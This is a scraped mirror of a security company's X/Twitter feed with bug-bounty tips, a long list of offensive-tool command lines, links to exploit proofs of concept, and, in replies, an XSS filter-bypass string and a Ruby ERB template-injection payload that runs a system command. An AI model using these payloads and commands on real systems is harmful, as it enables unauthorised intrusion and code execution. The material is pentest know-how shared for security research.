Olivia
Online
Wiseep
@wiseep_com
Wiseep is a hybrid perspective vulnerability scanning solution. Starts with a reasonable scanning fee, then you only have to pay if a vulnerability exists.
Beverley, England
Joined February 2012
566 Following
1.6K Followers
416 Posts
Here's a cool trick for y'all looking to create new Nuclei templates for exploitable CVEs!
Using CVEmap you can get a list of CVEs with public proofs of concept, that have been marked as exploitable by CISA, are remotely exploitable AND don't have a Nuclei template (yet)!
Flags:
-k / -kev: Marked as exploitable vulnerabilities by CISA
-t=false / -template=false: Has no public Nuclei templates
-poc: Has public published POC
-re / -remote: is remotely exploitable
Good luck! 🤞
#nuclei #hacking #pentesting #bugbounty #CVEmap
We welcome the recent decisions by the UK, Canada, Australia, Portugal, France, Malta, and Luxembourg to recognize Palestine as a free state.
We also send our heartfelt greetings to the all peace supporters. That is one of them from Sydney Harbour Bridge🙏
JShunter
JShunter is a command-line tool designed for analyzing JavaScript files and extracting endpoints. This tool specializes in identifying sensitive data, such as API endpoints and potential security vulnerabilities, making it an essential resource for developers, bug bounty and security researchers.
https://t.co/Wdhk76wkVB
👻👻👻Nuclei AI Prompts for @pdnuclei
Nuclei v3.3.9 (@pdiscoveryio) has -ai option to generate and run nuclei templates on the fly in natural language.
This is a list of prompts for this option:
- sensitive data exposure
- SQLi
- XSS
- SSRF
✅Join Telegram- https://t.co/hbAZWP8v0p
✅https://t.co/FDEsNv1oud
#cybersecurity #bugbounty #bugbountytips
Are you using subfinder wrong?
Most people using it just stick to the default sources but did you know you can supercharge it with the help of APIs?
Available sources:
✅ alienvault
✅ anubis
✅ bevigil
✅ binaryedge
✅ bufferover
✅ c99
✅ censys
✅ certspotter
✅ chaos
✅ chinaz
✅ commoncrawl
✅ crtsh
✅ digitorus
✅ dnsdb
✅ dnsdumpster
✅ dnsrepo
✅ fofa
✅ fullhunt
✅ github
✅ hackertarget
✅ hunter
✅ intelx
✅ netlas
✅ leakix
✅ quake
✅ rapiddns
✅ redhuntlabs
✅ robtex
✅ securitytrails
✅ shodan
✅ sitedossier
✅ threatbook
✅ threatcrowd
✅ virustotal
✅ waybackarchive
✅ whoisxmlapi
✅ zoomeyeapi
✅ facebook
✅ builtwith
✅ hudsonrock
✅ digitalyama
Just add your API keys to the provider-config.yaml file and start finding more subs today!
#cybersecurity #hacking #bugbounty #infosec #pentesting
Nice writeup about performing IOS mobile penetration tests without a physical device.
https://t.co/Otrh0JjFvy
80 Bug bounty tips for my lovely dovely fam <3
1️⃣ Use sqlmap --risk=3 --level=5 for aggressive SQLi testing.
2️⃣ Automate XSS hunting with Dalfox -b https://t.co/KpprP9d0F4 -u https://t.co/DAXb48PfCx 🚀
3️⃣ Check for subdomain takeovers with subzy --targets subdomains.txt
4️⃣ Use amass enum -passive -d https://t.co/DAXb48PfCx for deep subdomain recon 🌎
5️⃣ Bypass WAFs with ffuf -w payloads.txt -u https://t.co/7zoC5kaeTf -H "X-Originating-IP: 127.0.0.1"
6️⃣ Automate JWT cracking with jwt_tool -C -t token.jwt --wordlist rockyou.txt 🔑
7️⃣ Scan GraphQL endpoints with GraphQLmap -u https://t.co/O6xxLxef3c 🛠
8️⃣ Bruteforce hidden directories with dirsearch -u https://t.co/bk7AB2mewQ -e php,html,js
9️⃣ Find misconfigured S3 buckets with aws s3 ls s3://bucket-name/ --no-sign-request ☁
🔟 Bypass SSRF restrictions by resolving DNS using Burp Collaborator
1️⃣1️⃣ Check for open redirects with qsreplace 'https://t.co/Feek7AqOIU' | httpx -silent 🔄
1️⃣2️⃣ Use subfinder -d https://t.co/DAXb48PfCx | httpx -silent to filter live subdomains 🏠
1️⃣3️⃣ Hunt for leaked API keys with truffleHog --regex --entropy=True 🔑
1️⃣4️⃣ Automate CORS misconfig detection with Corsy -u https://t.co/bk7AB2mewQ
1️⃣5️⃣ Enumerate subdomains via https://t.co/qyWccMfUKW with curl "https://t.co/lDgz1W8lkS"
1️⃣6️⃣ Scan for open ports with nmap -p- -T4 -A https://t.co/DAXb48PfCx 🔍
1️⃣7️⃣ Find webhooks & exposed APIs with gf webhook | httpx -silent
1️⃣8️⃣ Automate CSRF token stealing with Burp Suite Autorize Plugin
1️⃣9️⃣ Extract secrets from .git with git-dumper https://t.co/D1nhYlN1AS /output-dir 🕵️♂️
2️⃣0️⃣ Scan for JWT weak secrets with jwtcrack -t token.jwt -w rockyou.txt
2️⃣1️⃣ Fuzz POST parameters with ffuf -X POST -d "param=FUZZ" -w payloads.txt -u https://t.co/DAXb48PfCx
2️⃣2️⃣ Automate broken authentication checks with nuclei -t cves/ -l targets.txt 🔓
2️⃣3️⃣ Automate IDOR checks with ParamSpider -d https://t.co/DAXb48PfCx 🕸
2️⃣4️⃣ Search for AWS credentials with ripgrep -e "AKIA[A-Z0-9]{16}"
2️⃣5️⃣ Bypass CSP with JSONP endpoints using jsonp-hunter -u https://t.co/DAXb48PfCx
2️⃣6️⃣ Check for template injection with tplmap -u https://t.co/bk7AB2mewQ -p param 🛠
2️⃣7️⃣ Hunt for subdomain takeovers using subjack -w subdomains.txt -t 50 -o results.txt
2️⃣8️⃣ Automate WebSocket testing with wssip -u wss://target.com 🔌
2️⃣9️⃣ Scan for vulnerable third-party libraries with Retire.js 🔥
3️⃣0️⃣ Extract exposed API keys from JavaScript with linkfinder -i target.js
3️⃣1️⃣ Test for Host header attacks using curl -H "Host: https://t.co/mo2GiPbqH0" https://t.co/bk7AB2mewQ
3️⃣2️⃣ Extract parameters from JS files using ParamSpider -d https://t.co/DAXb48PfCx
3️⃣3️⃣ Use xsstrike -u https://t.co/bk7AB2mewQ for automated XSS scanning 🛡
3️⃣4️⃣ Automate GraphQL security scanning with InQL Scanner
3️⃣5️⃣ Automate API token brute-force with patator http_fuzz
3️⃣6️⃣ Scan for misconfigured Firebase databases with https://t.co/39cgWdaB6z https://t.co/DAXb48PfCx 🔥
3️⃣7️⃣ Use dnsx -l subdomains.txt -silent -a to resolve A records of subdomains
3️⃣8️⃣ Scan for HTTP smuggling vulnerabilities with https://t.co/VRu2DoFHcB -u https://t.co/bk7AB2mewQ
3️⃣9️⃣ Bruteforce JWT signing keys with crackjwt --token token.jwt --wordlist rockyou.txt 🔑
4️⃣0️⃣ Use hakrawler -url https://t.co/bk7AB2mewQ -depth 2 -plain to extract URLs
4️⃣1️⃣ Fuzz REST API endpoints with ffuf -u https://t.co/So7RZd79u3 -w wordlist.txt
4️⃣2️⃣ Test for blind XSS using https://t.co/5QfVyKDySq payloads
4️⃣3️⃣ Hunt for forgotten test endpoints with waybackurls https://t.co/DAXb48PfCx | gf test-endpoints
4️⃣4️⃣ Scan for HTTP/2 desync vulnerabilities with request-smuggler
4️⃣5️⃣ Find outdated WordPress plugins using wpscan --url https://t.co/bk7AB2mewQ
4️⃣6️⃣ Automate reverse shell generation using msfvenom 🎯
4️⃣7️⃣ Discover parameter pollution vulnerabilities with arjun -u https://t.co/bk7AB2mewQ
4️⃣8️⃣ Find misconfigured Open Redirects using OpenRedireX
4️⃣9️⃣ Scan for CSP weaknesses using csp-evaluator 🛡
5️⃣0️⃣ Find duplicate passwords in response bodies with gf passwords
5️⃣1️⃣ Bruteforce directories using feroxbuster -u https://t.co/bk7AB2mewQ -e -t 50
5️⃣2️⃣ Identify API vulnerabilities using nuclei -t nuclei-templates/api
5️⃣3️⃣ Scan for outdated dependencies with OWASP Dependency-Check
5️⃣4️⃣ Find JavaScript vulnerabilities with jsleak -u https://t.co/bk7AB2mewQ
5️⃣5️⃣ Automate hidden parameter detection using Parameth
5️⃣6️⃣ Scan for FTP misconfigurations using nmap -p 21 --script=ftp-anon https://t.co/DAXb48PfCx
5️⃣7️⃣ Enumerate usernames on WordPress with wpscan --enumerate u -u https://t.co/bk7AB2mewQ
5️⃣8️⃣ Automate XSS payload injection using XSStrike
5️⃣9️⃣ Detect leaked credentials in repositories using GitLeaks
6️⃣0️⃣ Scan for SSRF using Burp Suite Collaborator
6️⃣1️⃣ Enumerate login endpoints using waybackurls & gau
6️⃣2️⃣ Automate JWT attacks with jwt-pwn
6️⃣3️⃣ Hunt for forgotten admin panels with Gobuster dir -u https://t.co/bk7AB2mewQ -w wordlist.txt
6️⃣4️⃣ Scan for WordPress misconfigurations with WPScan
6️⃣5️⃣ Automate GraphQL endpoint fuzzing with GraphQLmap
6️⃣6️⃣ Use dnsrecon -d https://t.co/DAXb48PfCx -t axfr to check for DNS zone transfers
6️⃣7️⃣ Find API token leaks in JavaScript using SecretFinder
6️⃣8️⃣ Bypass robots.txt restrictions with wget --mirror --no-robots
6️⃣9️⃣ Test for LFI vulnerabilities using dotdotpwn
7️⃣0️⃣ Scan for API misconfigurations using Swagger Scanner
7️⃣1️⃣ Automate CSRF attack simulation using XSRFProbe
7️⃣2️⃣ Find hardcoded credentials using truffleHog
7️⃣3️⃣ Automate response time-based attacks using timing-attack
7️⃣4️⃣ Fuzz HTTP methods using metasploit auxiliary/scanner/http/http_methods
7️⃣5️⃣ Automate cookie poisoning attacks using Cookiemonster
7️⃣6️⃣ Extract sensitive data from memory dumps using volatility
7️⃣7️⃣ Bypass authentication using Burp Suite NoSQLMap
7️⃣8️⃣ Automate vulnerability detection with ProjectDiscovery Nuclei
7️⃣9️⃣ Scan for JavaScript key leaks using JSParser
8️⃣0️⃣ Hunt for vulnerable headers using Security Headers Scanner
🚀 Happy Hunting! 🎯💻 #BugBounty #CyberSecurity #EthicalHacking #Pentesting #Automation #BugHunting
Have you ever tried a pay-as-you-go model to get rid of vulnerabilities in your web apps, mobile apps, infrastructure, and more? Also free scan options for certain types of assets.
Learn more;
https://t.co/9SrDcp6PYy
#infosec #cybersecurity #informationsecurity #CyberSec
FULL exploit POC for latest Tomcat called CVE-2025-27636
https://t.co/Va4wM6cLwA
Not illogical 🙂
Have you ever tried a pay-as-you-go model to get rid of vulnerabilities in your web apps, mobile apps, infrastructure, and more? Also free scan options for certain types of assets.
Learn more;
https://t.co/9SrDcp6PYy
#infosec #cybersecurity #informationsecurity #CyberSec
Just published an exploit for CVE-2024-45519, check your smtp servers to see if there is any issue there
POC: https://t.co/9QL7rFEdq7
#BugBounty #CyberSecurity #EthicalHacking #InfoSec #VulnerabilityDisclosure #PenTesting #RedTeam #BlueTeam #ZeroDay
@nnwakelam Perfect. First revelation is also 'Read' in surah Al-Alak:)
@plmaltais Worked for me like a payload "+onmou<!--esi-->seover=ale<!--esi-->rt(1)+ab=" . Thanks.
Came a cross an SSTI on Ruby ERB template, got a blind RCE by bypassing "." on server by using this payload "<%25%3d system("ping 96312190") %25>" It might be useful note it down.
@jobertabma I really wonder your idea about severity about this one, #834898
could you have a look if you have enough time? Many thanks.
Last Seen Users on Sotwe
Sarkar_121
Seen from Germany
Yudi12
Seen from Indonesia
Tuấn Anh
Seen from Vietnam
CHUYÊN GAY HAY
Seen from Vietnam
evi_eee
Seen from Malaysia
Mister killer 🔪
Seen from Turkey
سكس ممرضة
Seen from Saudi Arabia
ผักกาด
Seen from Thailand
Bokep Indo Tiktok Hot Abg Mesum Telanjang Viral
Seen from Singapore
peelovernyli
Seen from Egypt
Most Popular Users
Elon Musk 
@elonmusk
240.4M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.7M followers
Cristiano Ronaldo
@cristiano
110M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.5M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.8M followers
KATY PERRY
@katyperry
87.4M followers
Taylor Swift
@taylorswift13
81.2M followers
Lady Gaga
@ladygaga
72.7M followers
Kim Kardashian
@kimkardashian
69.6M followers
Virat Kohli
@imvkohli
69.4M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.7M followers
The Ellen Show
@theellenshow
62.5M followers
Neymar Jr
@neymarjr
62.1M followers
CNN
@cnn
61.9M followers
X
@x
60.8M followers
Selena Gomez
@selenagomez
60.5M followers